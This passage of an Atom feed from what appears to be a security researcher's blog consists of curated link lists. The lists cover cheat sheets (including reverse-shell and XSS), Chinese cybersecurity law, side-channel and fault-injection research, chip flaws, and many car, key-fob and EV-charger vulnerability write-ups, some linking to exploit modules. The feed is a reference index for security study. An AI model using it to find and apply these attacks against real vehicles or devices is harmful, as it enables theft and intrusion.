atom.xml
<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title>Delikely's Blog</title>
<subtitle>Tell you a story.</subtitle>
<link href="http://delikely.github.io/atom.xml" rel="self"/>
<link href="http://delikely.github.io/"/>
<updated>2024-05-26T16:57:19.496Z</updated>
<id>http://delikely.github.io/</id>
<author>
<name>Delikely</name>
</author>
<generator uri="https://hexo.io/">Hexo</generator>
<entry>
<title>Memo</title>
<link href="http://delikely.github.io/2099/01/01/cheatSheet/"/>
<id>http://delikely.github.io/2099/01/01/cheatSheet/</id>
<published>2099-01-01T14:00:00.000Z</published>
<updated>2024-05-26T16:57:19.496Z</updated>
<content type="html"><![CDATA[<h2 id="Cheat-Sheet"><a href="#Cheat-Sheet" class="headerlink" title="Cheat Sheet"></a>Cheat Sheet</h2><ul><li><a href="https://devhints.io">Devhints — cheatsheets</a></li><li><a href="https://cheatsheetseries.owasp.org">OWASP Cheat Sheet Series</a></li><li><a href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md">Reverse Shell Cheat Sheet</a></li><li><a href="https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#restricted-characters">Cross-site scripting (XSS) cheat sheet</a></li><li><a href="https://darkdust.net/files/GDB%20Cheat%20Sheet.pdf">GDB cheatsheet</a></li><li><a href="https://hex-rays.com/products/ida/support/freefiles/IDA_Pro_Shortcuts.pdf">IDA Pro Shortcuts</a></li><li><a href="https://courses.cs.washington.edu/courses/cse469/19wi/arm64.pdf">ARMv8 A64 Quick Reference</a></li><li><a href="https://byte.how/posts/what-are-you-telling-me-ghidra/">What’re you telling me, Ghidra?</a></li></ul><h2 id="测试指南"><a href="#测试指南" class="headerlink" title="测试指南"></a>Testing Guides</h2><ul><li><a href="https://mp.weixin.qq.com/s/KyVHDyfJedhW3_dXAUBETw">App Compliance Development Guide</a></li><li><a href="https://scriptingxss.gitbook.io/firmware-security-testing-methodology/v/zhong-wen-fstm/">OWASP Firmware Security Testing Methodology</a></li></ul><h2 id="白皮书"><a href="#白皮书" class="headerlink" title="白皮书"></a>White Papers</h2><ul><li><a href="http://www.caict.ac.cn/kxyj/qwfb/bps/202007/P020200730529570390226.pdf">Development and Operations Security White Paper (2020)</a></li><li><a href="http://www.caict.ac.cn/kxyj/qwfb/bps/201909/P020190923420831742865.pdf">China Cybersecurity Industry White Paper (2019)</a></li></ul><h2 id="法规"><a href="#法规" class="headerlink" title="法规"></a>Laws and Regulations</h2><ul><li><a href="https://lawrefbook.github.io/">China Law Quick Reference Handbook</a></li><li><a href="http://www.npc.gov.cn/wxzl/gongbao/2017-02/20/content_2007531.htm">Cybersecurity Law of the People's Republic of China</a></li><li><a href="http://www.npc.gov.cn/npc/c30834/202108/a8c4e3672c74491a80b53a172bb753fe.shtml">Personal Information Protection Law of the People's Republic of China</a></li><li><a href="http://www.gov.cn/zhengce/content/2021-08/17/content_5631671.htm">Regulations on the Security Protection of Critical Information Infrastructure</a></li><li><a href="http://www.cac.gov.cn/2021-07/13/c_1627761607640342.htm">Provisions on the Management of Security Vulnerabilities in Network Products</a></li><li><a href="http://www.cac.gov.cn/2023-03/23/c_1681211418907384.htm">Provisions on Administrative Law Enforcement Procedures of Cyberspace Administration Departments</a></li><li><a href="http://www.cac.gov.cn/2020-04/27/c_1589535450769077.htm">Cybersecurity Review Measures</a></li><li><a href="http://www.cac.gov.cn/2019-12/27/c_1578986455686625.htm">Notice on Issuing the Methods for Identifying Illegal and Irregular Collection and Use of Personal Information by Apps</a></li><li><a href="https://mp.weixin.qq.com/s/ZXlFRyuxCAB1m-iDpWqDNg">Guiding Opinions of the Supreme People's Court, the Supreme People's Procuratorate and the Ministry of Public Security on Punishing Cyber Violence Offences According to Law (Draft for Comment)</a></li><li><a href="https://mp.weixin.qq.com/s/v-eReNBc0QUrhmfpdsXiCQ">Cyberspace Administration of China: Provisions on the Administration of Short-Range Ad Hoc Network Information Services (Draft for Comment)</a></li><li><a href="http://www.cac.gov.cn/2023-07/03/c_1690034742530280.htm">Announcement on Adjusting the Catalogue of Critical Network Equipment and Cybersecurity-Specific Products</a></li></ul><h2 id="标准"><a href="#标准" class="headerlink" title="标准"></a>Standards</h2><ul><li><a href="https://openstd.samr.gov.cn/bzgk/gb/newGbInfo?hcno=AD7E0F02219B63653BF850759A1030C4">GB/T 42446-2023 Information Security Technology: Basic Competence Requirements for Cybersecurity Practitioners</a></li></ul><h2 id="论文"><a href="#论文" class="headerlink" title="论文"></a>Papers</h2><ul><li><a href="https://arxiv.org/ftp/arxiv/papers/1910/1910.01321.pdf">An Empirical Study of C++ Vulnerabilities in Crowd-Sourced Code Examples</a></li><li><a href="https://nebelwelt.net/publications/files/20SEC3.pdf">USBFuzz: A Framework for Fuzzing USB Drivers by Device Emulation</a></li><li><a href="https://cybersecurity.springeropen.com/track/pdf/10.1186/s42400-021-00091-9.pdf">ESRFuzzer: an enhanced fuzzing framework for physical SOHO router devices to discover multi-Type vulnerabilities</a></li><li><a href="https://syssec.kaist.ac.kr/pub/2019/kim_sp_2019.pdf">Touching the Untouchables: Dynamic Security Analysis of the LTE Control Plane</a></li><li><a href="https://dl.acm.org/doi/abs/10.1145/3387514.3406219">NFC+: Breaking NFC Networking Limits through Resonance Engineering</a> <a href="http://xyzhang.ucsd.edu/papers/RZhao_SIGCOMM20_NFC+.pdf">PDF</a> <a href="https://renjiezhao.github.io/files/NFCplus_slides_20min.pptx">Slides</a></li><li><a href="https://www.usenix.org/system/files/woot20-paper-klee.pdf">NFCGate: Opening the Door for NFC Security Research with a Smartphone-Based Toolkit</a></li></ul><h2 id="SOMETHING"><a href="#SOMETHING" class="headerlink" title="SOMETHING"></a>SOMETHING</h2><ul><li><a href="https://www.trickster.dev/post/decrypting-your-own-https-traffic-with-wireshark/">Decrypting your own HTTPS traffic with Wireshark</a></li></ul><h2 id="开源项目"><a href="#开源项目" class="headerlink" title="开源项目"></a>Open Source Projects</h2><ul><li><a href="https://github.com/xairy/linux-kernel-exploitation">linux-kernel-exploitation: A collection of links related to Linux kernel security and exploitation</a></li></ul><h2 id="其他"><a href="#其他" class="headerlink" title="其他"></a>Other</h2><ul><li><a href="https://mp.weixin.qq.com/s/vKqjc1uTajClu7bsn9yfLA">Ministry of Public Security Publishes 10 Typical Cases of Cracking Down on Hacking Crimes</a></li></ul>]]></content>
<summary type="html"><h2 id="Cheat-Sheet"><a href="#Cheat-Sheet" class="headerlink" title="Cheat Sheet"></a>Cheat Sheet</h2><ul>
<li><a href="https://devhints.io</summary>
</entry>
<entry>
<title>Frontier Areas</title>
<link href="http://delikely.github.io/2099/01/01/advanced/"/>
<id>http://delikely.github.io/2099/01/01/advanced/</id>
<published>2099-01-01T13:00:00.000Z</published>
<updated>2024-05-05T08:59:23.521Z</updated>
<content type="html"><![CDATA[<h2 id="侧信道"><a href="#侧信道" class="headerlink" title="侧信道"></a>Side Channels</h2><ul><li><a href="https://arxiv.org/pdf/2105.12266">Wireless Charging Power Side-Channel Attacks</a></li><li><a href="https://ktln2.org/experiments-around-side-channels/">side channels: power analysis</a></li><li><a href="https://github.com/ggerganov/kbd-audio">kbd-audio: Acoustic keyboard eavesdropping (github.com)</a></li><li><a href="https://arxiv.org/abs/2301.00250">DensePose From WiFi</a></li><li><a href="https://www.hertzbleed.com">Hertzbleed Attack: a side-channel attack that allows remotely stealing encryption keys from AMD and Intel chips</a></li><li><a href="https://www.usenix.org/conference/usenixsecurity21/presentation/cronin">Charger-Surfing: Exploiting a Power Line Side-Channel for Smartphone Information Leakage</a></li><li><a href="https://ghosttalkattack.github.io/">GhostTalk: Interactive Attack on Smartphone Voice System Through Power Line</a> <a href="https://bbs.pediy.com/thread-271716.htm">Translation</a></li><li><a href="https://www.usenix.org/system/files/sec22summer_wang-kai.pdf">GhostTouch: Targeted Attacks on Touchscreens without Physical Touch</a> <a href="https://bbs.pediy.com/thread-271675.htm">Translation</a></li><li><a href="https://github.com/USSLab/DolphinAttack">DolphinAttack: Inaudible Voice Commands</a></li><li><a href="https://surfingattack.github.io/">SurfingAttack: covert attacks on voice assistants via ultrasonic waves</a></li><li><a href="https://www.cs.umd.edu/~nirupam/images/2_publication/papers/LidarPhone_SenSys20_nirupam.pdf">Turning a Xiaomi robot vacuum into an eavesdropping device using its LiDAR</a></li><li><a href="https://lightcommands.com/">Light Commands: injecting commands into MEMS microphones with lasers</a></li><li><a href="https://dl.acm.org/doi/10.1145/3485832.3485894">Obfuscation Revealed: Leveraging Electromagnetic Signals for Obfuscated Malware Classification</a></li><li><a href="https://usslab.org/projects/dewicam.html">DeWiCam: detecting hidden spy cameras through traffic analysis</a></li><li><a href="https://mp.weixin.qq.com/s/N6CWX9ZVnbyeYBIibwb0SA">A beautiful side channel: from timeless attacks to pipeline amplification attacks</a></li><li><a href="https://www.cl.cam.ac.uk/~rja14/Papers/SEv3-ch19-7sep.pdf">Security Engineering: A Guide to Building Dependable Distributed Systems, 3rd Edition (Chapter 19: Side Channels)</a></li><li><a href="https://keytap3.ggerganov.com/">Keytap3: acoustic keyboard eavesdropping</a> <a href="https://github.com/ggerganov/kbd-audio">source</a></li></ul><h2 id="故障注入"><a href="#故障注入" class="headerlink" title="故障注入"></a>Fault Injection</h2><ul><li><a href="https://github.com/ElectronicCats/faultycat">ElectronicCats/faultycat: Faulty Cat is a low-cost Electromagnetic Fault Injection (EMFI) tool, designed specifically for self-study and hobbyist research</a></li><li><a href="https://www.synacktiv.com/publications/how-to-voltage-fault-injection">How to voltage fault injection</a></li><li><a href="https://blog.zapb.de/stm32f1-exceptional-failure/">Exception(al) Failure - Breaking the STM32F1 Read-Out Protection</a></li><li><a href="https://www.iacr.org/archive/ches2011/69170208/69170208.pdf">Breaking Mifare DESFire MF3ICD40: Power Analysis and Templates in the Real World</a></li><li><a href="https://www.collshade.fr/articles/reneshack/rx_glitch_article.html">CVE-2021-43327 Renesas RX65 Glitching</a></li><li><a href="https://github.com/atc1441/ESP32_nRF52_SWD">ESP32_nRF52_SWD: This software brings you the possibility to Read and Write the internal Flash of the Nordic nRF52 series with an ESP32</a></li><li><a href="https://blog.csdn.net/qq_33917045/article/details/120580025">Bypassing APPROTECT to extract nRF52840 firmware (reproducing CVE-2020-27211)</a></li><li><a href="https://paper.seebug.org/1929/">Voltage glitch injection to bypass debug protection on nRF52 chips</a></li><li><a href="https://blog.willemmelching.nl/carhacking/2022/11/08/rh850-glitch/">Bypassing the Renesas RH850/P1M-E read protection using fault injection</a></li><li><a href="https://voidstarsec.com/blog/replicant-part-1">Replicant: Reproducing a Fault Injection Attack on the Trezor One</a></li><li><a href="https://eprint.iacr.org/2020/937.pdf">BAM BAM!! On Reliability of EMFI for in-situ Automotive ECU Attacks</a></li><li><a href="https://www.riverloopsecurity.com/blog/2021/09/introducing-flash-bash/">Flash BASH: A tool which automates glitching and allows for precise timing attacks</a></li><li><a href="https://limitedresults.com/2021/06/enter-the-efm32-gecko/">Enter the EFM32 Gecko</a></li><li><a href="https://limitedresults.com/2021/03/the-pocketglitcher/">The PocketGlitcher</a></li><li><a href="https://limitedresults.com/2020/06/nrf52-debug-resurrection-approtect-bypass/">nRF52 Debug Resurrection (APPROTECT Bypass) Part 1</a> <a href="https://limitedresults.com/wp-content/uploads/2020/12/eu-20-Limiteresults-Debug-Resurrection-On-nRF52-Series.pdf">Slides</a></li><li><a href="https://limitedresults.com/2020/06/nrf52-debug-resurrection-approtect-bypass-part-2/">nRF52 Debug Resurrection (APPROTECT Bypass) Part 2</a></li><li><a href="https://limitedresults.com/2019/05/pwn-mbedtls-on-esp32-dfa-warm-up/">Pwn MBedTLS on ESP32: DFA Warm-up</a></li><li><a href="https://circuitcellar.com/research-design-hub/attacking-usb-gear-with-emfi/">Attacking USB Gear with EMFI</a> <a href="https://www.totalphase.com/media/pdf/whitepapers/Circuit_Cellar_TP.pdf">PDF</a></li><li><a href="https://raelize.com/blog/espressif-systems-esp32-bypassing-sb-using-emfi/">Espressif ESP32: Bypassing Secure Boot using EMFI</a></li><li><a href="https://tches.iacr.org/index.php/TCHES/article/view/8727/8327">Fill your Boots: Enhanced Embedded Bootloader Exploits via Fault Injection and Binary Analysis</a></li><li><a href="https://swisskyrepo.github.io/HardwareAllTheThings/side-channel/fault-injection/">Fault Injection - Pin2pwn</a></li></ul><h2 id="AI"><a href="#AI" class="headerlink" title="AI"></a>AI</h2><ul><li><a href="https://dreamlab.net/en/blog/post/attacking-biometric-systems-with-3d-printing-1/">Attacking Biometric Systems with 3D Printing</a></li><li><a href="https://security.tencent.com/index.php/blog/msg/204">Real-time Chinese voice cloning: trying out the open-source project MockingBird</a></li></ul><h2 id="芯片漏洞"><a href="#芯片漏洞" class="headerlink" title="芯片漏洞"></a>Chip Vulnerabilities</h2><ul><li><a href="https://www.vusec.net/projects/slam/">SLAM: Spectre based on Linear Address Masking</a></li><li><a href="https://lock.cmpxchg8b.com/zenbleed.html">Zenbleed</a></li><li><a href="https://aepicleak.com/">ÆPIC Leak</a></li><li><a href="https://meltdownattack.com/">Meltdown and Spectre</a></li></ul>]]></content>
<summary type="html"><h2 id="侧信道"><a href="#侧信道" class="headerlink" title="侧信道"></a>Side Channels</h2><ul>
<li><a href="https://arxiv.org/pdf/2105.12266">Wireless Charging</summary>
</entry>
<entry>
<title>Automotive Security</title>
<link href="http://delikely.github.io/2099/01/01/automotive-security/"/>
<id>http://delikely.github.io/2099/01/01/automotive-security/</id>
<published>2099-01-01T12:00:00.000Z</published>
<updated>2024-05-27T02:14:07.641Z</updated>
<content type="html"><![CDATA[<p><a href="https://delikely.github.io/Automotive-Security-Timeline/">Automotive Cybersecurity Incident Timeline</a>: <a href="https://delikely.github.io/Automotive-Security-Timeline/">timeline.icvsec.com</a></p><h2 id="漏洞"><a href="#漏洞" class="headerlink" title="漏洞"></a>Vulnerabilities</h2><ul><li><a href="https://goncalomb.com/blog/2024/01/30/f57cf19b-how-i-also-hacked-my-car">How I Also Hacked my Car</a></li><li><a href="https://icanhack.nl/blog/secoc-key-extraction/">Extracting Secure Onboard Communication (SecOC) keys from a 2021 Toyota RAV4 Prime Power</a></li><li><a href="https://autohack.in/2023/04/07/pwning-my-friends-new-car/">Pwning my Friend's New Car: Digital Cockpit sKiddie Rooting</a></li><li><a href="https://xakcop.com/post/hyundai-hack-2/">Hyundai Head Unit Hacking · random hacks Standard-class Gen5 navigation</a></li><li><a href="https://mp.weixin.qq.com/s/5LNIutNmfCqPKN20ZE-4uQ">ASRG-China community discovers critical T-Box vulnerabilities at SANY Heavy Industry and other companies</a></li><li><a href="https://sowhat.iit.cnr.it:8443/can-work/chimaera">CHIMAERA (Custom Hyundai Motor group infotAinmEnt fiRmwAre) is a set of issues that we found on the Gen5W_L In-Vehicle Infotainment system</a></li><li><a href="https://sowhat.iit.cnr.it:8443/can-work/koffee">KOFFEE: An Android app for Kia Gen5 Head Units (HUs) that is built to exploit the vulnerability (CVE-2020-853)</a></li><li><a href="https://kentindell.github.io/2023/04/03/can-injection/">CAN Injection: keyless car theft</a></li><li><a href="https://www.ndss-symposium.org/ndss-paper/auto-draft-305/">Disclosing the Pringles Syndrome in Tesla FSD Vehicles</a></li><li><a href="https://eaton-works.com/2023/02/06/toyota-gspims-hack/">Hacking into Toyota’s global supplier management network</a></li><li><a href="https://www.saiflow.com/how-mishandling-of-websockets-can-cause-dos-and-energy-theft">How Mishandling of WebSockets Can Cause DoS and Energy Theft</a></li><li><a href="https://techcrunch.com/2022/09/21/kia-hyundai-sued-after-viral-tiktok-causes-rise-in-thefts/">Kia, Hyundai sued after viral TikTok causes rise in thefts</a></li><li><a href="https://samcurry.net/web-hackers-vs-the-auto-industry/">Web Hackers vs. The Auto Industry: Critical Vulnerabilities in Ferrari, BMW, Rolls Royce, Porsche, and More</a></li><li><a href="https://www.navinfo.eu/insights/navinfo-europe-presents-cybersecurity-research-on-volkswagen-id-3-at-black-hat-europe/">Back-connect to the Connected Car. Search for Vulnerabilities in the VW Electric Car.</a></li><li><a href="https://twitter.com/samwcyo/status/1597695281881296897">A vulnerability affecting Hyundai and Genesis vehicles where we could remotely control cars</a></li><li><a href="https://twitter.com/samwcyo/status/1597792097175674880">SiriusXM IDOR vulnerability exposed vehicle tokens, allowing unauthorized remote control of Honda, Nissan, Infiniti, and Acura vehicles</a></li><li><a href="https://www.blackhat.com/us-22/briefings/schedule/#rollback---a-new-time-agnostic-replay-attack-against-the-automotive-remote-keyless-entry-systems-27185">RollBack - A New Time-Agnostic Replay Attack Against the Automotive Remote Keyless Entry Systems</a></li><li><a href="https://www.mnemonic.io/resources/blog/reverse-engineering-an-ev-charger/">Reverse engineering an EV charger</a></li><li><a href="https://blog.willemmelching.nl/carhacking/2022/11/08/rh850-glitch/">Bypassing the Renesas RH850/P1M-E read protection using fault injection</a> <a href="https://github.com/I-CAN-hack/rh850-glitch">GitHub</a></li><li><a href="https://sec-consult.com/vulnerability-lab/advisory/multiple-memory-corruption-vulnerabilities-in-covesa-dlt-daemon/">Multiple Memory Corruption Vulnerabilities in COVESA DLT daemon</a></li><li><a href="https://github.com/fmsh-seclab/TesMla">TesMla: An app to complete man in the middle attack with Tesla Model 3</a></li><li><a href="https://act-on.ioactive.com/acton/attachment/34793/f-6460b49e-1afe-41c3-8f73-17dc14916847/1/-/-/-/-/NFC-relay-TESlA_JRoriguez.pdf">NFC Relay Attack on TESLA Model Y</a> <a href="https://www.youtube.com/watch?v=CpUFosSkna8">Video</a></li><li><a href="https://programmingwithstyle.com/posts/howihackedmycar/">How I Hacked my Car</a> <a href="https://mp.weixin.qq.com/s/-xlV8nPjIy5nUT4Zt4a5rg">Found a few keys on Google and cracked my own car?</a></li><li><a href="https://rollingpwn.github.io/rolling-pwn/">Rolling PWN: RF key rolling code resync</a></li><li><a href="https://trifinite.org/stuff/project_tempa/">Demystifying Tesla’s Bluetooth Passive Entry System</a> <a href="https://trifinite.org/Downloads/20220518_tempa_presentation_csw22_public.pdf">slides</a></li><li><a href="https://medium.com/@david_colombo/how-i-got-access-to-25-teslas-around-the-world-by-accident-and-curiosity-8b9ef040a028">How I got access to 25+ Tesla’s around the world. By accident. And curiosity</a></li><li><a href="https://research.nccgroup.com/2022/05/15/technical-advisory-tesla-ble-phone-as-a-key-passive-entry-vulnerable-to-relay-attacks/">Tesla BLE Phone-as-a-Key Passive Entry Vulnerable to Relay Attacks</a></li><li><a href="https://www.bilibili.com/video/BV1p34y1d746">[KeenLab Tech Talk (3)] An ordinary heap vulnerability in Android Auto</a></li><li><a href="https://www.synacktiv.com/publications/car-hijacking-swapping-a-single-bit.html">Car hijacking swapping a single bit</a></li><li><a href="https://keenlab.tencent.com/zh/2021/05/12/Tencent-Security-Keen-Lab-Experimental-Security-Assessment-on-Mercedes-Benz-Cars/">Tencent Keen Security Lab: Experimental Security Assessment on Mercedes-Benz Cars</a> <a href="https://keenlab.tencent.com/en/whitepapers/Mercedes_Benz_Security_Research_Report_Final.pdf">Technical white paper</a></li><li><a href="https://kunnamon.io/tbone/">TBONE – A zero-click exploit for Tesla MCUs</a></li><li><a href="https://colinoflynn.com/2020/11/bam-bam-on-reliability-of-emfi-for-in-situ-automotive-ecu-attacks/">BAM BAM!! On Reliability of EMFI for in-situ Automotive ECU Attacks</a></li><li><a href="https://gist.github.com/gianpyc/4dc8b0d0c29774a10a97785711e325c3">CVE-2020-8539: KIA Head Unit vulnerability</a> <a href="https://github.com/rapid7/metasploit-framework/blob/master//modules/post/android/local/koffee.rb">EXP</a></li><li><a href="https://xakcop.com/post/hyundai-hack/">Hacking Hyundai Tucson 2020 · random hacks</a></li><li><a href="https://github.com/jglim/UnsignedFlash">UnsignedFlash: Firmware signature bypass on the IC204 instrument clusters</a></li><li><a href="https://www.imec-int.com/en/press/belgian-security-researchers-ku-leuven-and-imec-demonstrate-serious-flaws-tesla-model-x">Tesla Model X Bluetooth key vulnerability</a> <a href="https://www.wired.com/story/tesla-model-x-hack-bluetooth/">WIRED</a> <a href="https://iacr.org/submit/files/slides/2021/rwc/rwc2021/55/slides.pdf">slides</a></li><li><a href="https://www.anquanke.com/post/id/213885">Tesla NFC relay attack (CVE-2020-15912)</a></li><li><a href="https://www.collshade.fr/articles/reneshack/rx_glitch_article.html">CVE-2021-43327 Renesas RX65 Glitching</a></li><li><a href="https://www.contextis.com/en/blog/a-code-signing-bypass-for-the-vw-polo">CVE-2020-28656: A code signing bypass for the VW Polo</a></li><li><a href="https://safekeepsecurity.com/about/cve-2020-10558/">CVE-2020-10558: Tesla Model 3 Vulnerability – Disable Autopilot Notifications, Speedometer, Web Browser, Climate Controls, Turn Signals, Nav, etc.</a></li><li><a href="https://www.esat.kuleuven.be/cosic/news/fast-furious-and-insecure-passive-keyless-entry-and-start-in-modern-supercars/">CVE-2018-16806: Tesla Model S PKES uses the weak DST40 cipher</a> <a href="https://tches.iacr.org/index.php/TCHES/article/view/8289/7862">Slides</a> <a href="https://www.wired.com/story/hackers-steal-tesla-model-s-seconds-key-fob/">WIRED</a> <a href="https://www.wired.com/story/hackers-steal-tesla-model-s-key-fob-encryption/">AGAIN</a></li><li><a href="https://www.pentestpartners.com/security-blog/reverse-engineering-tesla-hardware/">Reverse Engineering Tesla Hardware</a></li><li><a href="https://www.pentestpartners.com/security-blog/reverse-engineering-the-tesla-firmware-update-process/">Reverse Engineering the Tesla Firmware Update Process</a></li><li><a href="https://tches.iacr.org/index.php/TCHES/article/view/8546/8111">Texas Instruments DST80 encryption vulnerable</a> <a href="https://www.wired.com/story/hackers-can-clone-millions-of-toyota-hyundai-kia-keys/">WIRED</a></li><li><a href="https://medium.com/@reliable_lait_mouse_975/mercedes-comand-infotainment-improper-format-strings-handling-4c67063d744e">CVE-2020-16142: Mercedes-Benz mishandles a Bluetooth name of %x%x%x%x%x%x%x%x%x</a></li><li><a href="https://twitter.com/__Obzy__/status/864704956116254720">CVE-2017-9212: BMW mishandles a Bluetooth name of %x%x%x%x</a></li><li><a href="https://www.zerodayinitiative.com/blog/2019/12/18/regular-exploitation-of-a-tesla-model-3-through-chromium-regexp">Regular Exploitation of a Tesla Model 3 through Chromium RegExp</a></li><li><a href="https://skygo.360.cn/2020/07/20/mercedes-benz-research-report/">360 Sky-Go team releases the Mercedes-Benz Security Research Report</a></li><li><a href="https://keenlab.tencent.com/zh/2020/03/30/Tencent-Keen-Security-Lab-Experimental-Security-Assessment-on-Lexus-Cars/#more">Tencent Keen Security Lab: Experimental Security Assessment on Lexus Cars</a></li><li><a href="https://skygo.360.net/tcu-bug/">Ford, BMW, Infiniti and Nissan vehicle TCUs are vulnerable and can be remotely compromised</a> <a href="https://www.youtube.com/watch?v=5QBOmr_ZyLo">Video</a> <a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEF%20CON%2025%20-%20Jesse-Michael-and-Mickey-Shkatov-Driving-Down-the-Rabbit-Hole.pdf">Slides</a></li><li><a href="https://www.rapid7.com/blog/post/2017/04/25/r7-2017-02-hyundai-blue-link-potential-info-disclosure-fixed">R7-2017-02: Hyundai Blue Link Potential Info Disclosure</a></li><li><a href="https://github.com/shipcod3/mazda_getInfo/blob/master/README.md">mazda_getInfo: A PoC that the USB port is an attack surface for a Mazda car’s infotainment system</a></li><li><a href="http://jcarlosnorte.com/security/2016/03/06/hacking-tachographs-from-the-internets.html">TBOX | Hacking industrial vehicles from the internet</a> <a href="https://www.shodan.io/search?query=port%3A23+gps+"on+console"">Internet-exposed devices</a> <a href="https://fccid.io/A6GC4MAX-3GNA/Users-Manual/User-manual-2655341.pdf">C4MAX-3GNA Installation Guide</a></li><li><a href="https://www.vice.com/en_us/article/zmpx4x/hacker-monitor-cars-kill-engine-gps-tracking-apps">Hacker Finds He Can Remotely Kill Car Engines After Breaking Into GPS Tracking Apps</a></li><li><a href="https://www.usenix.org/conference/woot16/workshop-program/presentation/mazloom">A Security Analysis of an In-Vehicle Infotainment and App Platform (MirrorLink)</a> <a href="https://www.usenix.org/system/files/conference/woot16/woot16-paper-mazloom.pdf">Paper</a> <a href="https://www.usenix.org/sites/default/files/conference/protected-files/woot16_slides_mazloom_0.pdf">Slides</a></li><li><a href="http://www.mmt.hs-karlsruhe.de/downloads/IEEM/Schwachstellen/PCU_Vulnerability_Description_HsKA.PDF">CVE-2017-14937: Vulnerability in pyrotechnical control units (Airbags) of passenger cars</a> <a href="https://github.com/rapid7/metasploit-framework/blob/master//modules/post/hardware/automotive/pdt.rb">EXP</a></li><li><a href="https://www.troyhunt.com/controlling-vehicle-features-of-nissan/">Controlling vehicle features of Nissan LEAFs across the globe via vulnerable APIs</a></li><li><a href="https://github.com/samyk/opensesame">OpenSesame attacks wireless garages and can open most fixed-code garages and gates in seconds using a Mattel toy</a></li><li><a href="https://www.pentestpartners.com/security-blog/gone-in-six-seconds-exploiting-car-alarms/">Gone in six seconds? Exploiting car alarms</a></li><li><a href="https://www.pentestpartners.com/security-blog/obdeleven-vulnerability/">OBDeleven vulnerability</a></li><li><a href="https://argus-sec.com/remote-attack-bosch-drivelog-connector-dongle/">A Remote Attack on the Bosch Drivelog Connector Dongle</a> <a href="https://www.anquanke.com/post/id/85916">Translation</a></li><li><a href="https://decoded.avast.io/martinhron/the-secret-life-of-gps-trackers-2-2/">The secret life of GPS trackers (2/2)</a></li><li><a href="https://decoded.avast.io/martinhron/the-secret-life-of-gps-trackers">The secret life of GPS trackers (1/2)</a></li><li><a href="http://wooyun.moshou.org.cn/bugs/bug_detail.php?wybug_id=wooyun-2015-0143278">wooyun-2015-0143278: Wireless security: bypassing the rolling code of a BYD car model to keep unlocking it</a></li><li><a href="https://www.youtube.com/watch?v=575TcQJJWok">HackRF vs. Tesla Model S</a></li><li><a href="https://www.jkry.org/ouluhack/Toyota Touch & Go">Happy Hacking Toyota Touch&Go</a> <a href="http://www.happyhacking.org/HappyHacking/hacking/2012/03/05/Hacking-Toyota-Touh-and-go.html">More</a></li></ul><h2 id="充电桩漏洞"><a href="#充电桩漏洞" class="headerlink" title="充电桩漏洞"></a>EV Charger Vulnerabilities</h2><ul><li><a href="https://bbs.pediy.com/thread-272546.htm">Practical vulnerability hunting in EV charging stations</a></li><li><a href="https://www.mdpi.com/1996-1073/15/11/3931">Review of Electric Vehicle Charger Cybersecurity Vulnerabilities, Potential Impacts, and Defenses</a></li><li><a href="https://www.pentestpartners.com/security-blog/smart-car-chargers-plug-n-play-for-hackers/">Smart car chargers. Plug-n-play for hackers</a></li><li><a href="https://forum.butian.net/share/357">A journey of vulnerability hunting in Schneider EV chargers</a></li><li><a href="https://sec-consult.com/vulnerability-lab/advisory/authentication-bypass-remote-code-execution-in-schneider-electric-evlink-charging-stations/">Authentication bypass & Remote code execution in Schneider Electric EVlink Charging Stations</a> <a href="https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2021-194-06">Notification</a></li><li><a href="https://conference.hitb.org/hitbsecconf2021ams/sessions/x-in-the-middle-attacking-fast-charging-electric-vehicles/">X-in-the-Middle: Attacking Fast Charging Electric Vehicles</a></li><li><a href="https://www.pentestpartners.com/security-blog/pwning-a-smart-car-charger-building-a-botnet/">Pwning a Smart Car Charger, Building a Botnet</a></li><li><a href="https://github.com/FlUxIuS/V2GInjector">V2GInjector - Tool to intrude a V2G PowerLine network, but also to capture and inject V2G packets</a></li><li><a href="https://github.com/SadFud/Exploits/tree/master/Real%20World/Suites/cir-pwn-life">cir-pwn-life: proof of concept for exploiting multiple vulnerabilities affecting Circontrol products in an automated way</a></li><li><a href="https://download.schneider-electric.com/files?p_enDocType=Technical+leaflet&p_File_Name=SEVD-2018-354-01-EVLink.pdf">Security Notification – EVLink Parking</a></li><li><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/12/13084354/ChargePoint-Home-security-research_final.pdf">ChargePoint Home security research</a></li><li><a href="https://www.sohu.com/a/259418261_391288">e-Charge “gun-pinching method” and “second-timing method” cases</a></li></ul><h2 id="其他漏洞"><a href="#其他漏洞" class="headerlink" title="其他漏洞"></a>Other Vulnerabilities</h2><ul><li><a href="https://delikely.eu.org/2024/02/18/Cybellum-RCE/">Take a glance of browser, I find Cybellum RCE</a> <a href="https://cybellum.com/security-update-feb-24/">Security Update | Cybellum</a></li><li><a href="https://maxwelldulin.com/BlogPost?post=5370931200">Sears Garage Door Signal Reverse Engineering</a></li></ul><h2 id="隐私与数据安全"><a href="#隐私与数据安全" class="headerlink" title="隐私与数据安全"></a>Privacy and Data Security</h2><ul><li><a href="https://foundation.mozilla.org/en/privacynotincluded/categories/cars/">Cars | Privacy & security guide | Mozilla Foundation</a></li><li><a href="https://www.top10vpn.com/research/electric-vehicle-privacy/">Privacy Investigation: Chinese Electric Vehicle Exports</a></li></ul><h2 id="技术研究"><a href="#技术研究" class="headerlink" title="技术研究"></a>Technical Research</h2><ul><li><a href="https://0x44.cc/radio/2024/03/13/reversing-a-car-key-fob-signal.html">Reverse engineering a car key fob signal (Part 1)</a></li><li><a href="https://github.com/akrutsinger/tesla-charge-port-signal">tesla-charge-port-signal: Guided reverse engineering of Tesla’s charge port remote control signal</a></li><li><a href="https://www.usenix.org/conference/usenixsecurity13/dismantling-megamos-crypto-wirelessly-lockpicking-vehicle-immobilizer">Dismantling Megamos Crypto: Wirelessly Lockpicking a Vehicle Immobilizer | USENIX</a></li><li><a href="https://www.synacktiv.com/sites/default/files/2023-06/SecuriteDesVoitures.pdf">Security of connected vehicles</a></li><li><a href="https://bbs.pediy.com/thread-273814.htm">2022 Digital China IoV Security CTF writeup - uds_server</a></li><li><a href="https://sites.google.com/view/cav-sec/msf-adv?pli=1">Invisible for both Camera and LiDAR: Security of Multi-Sensor Fusion based Perception in 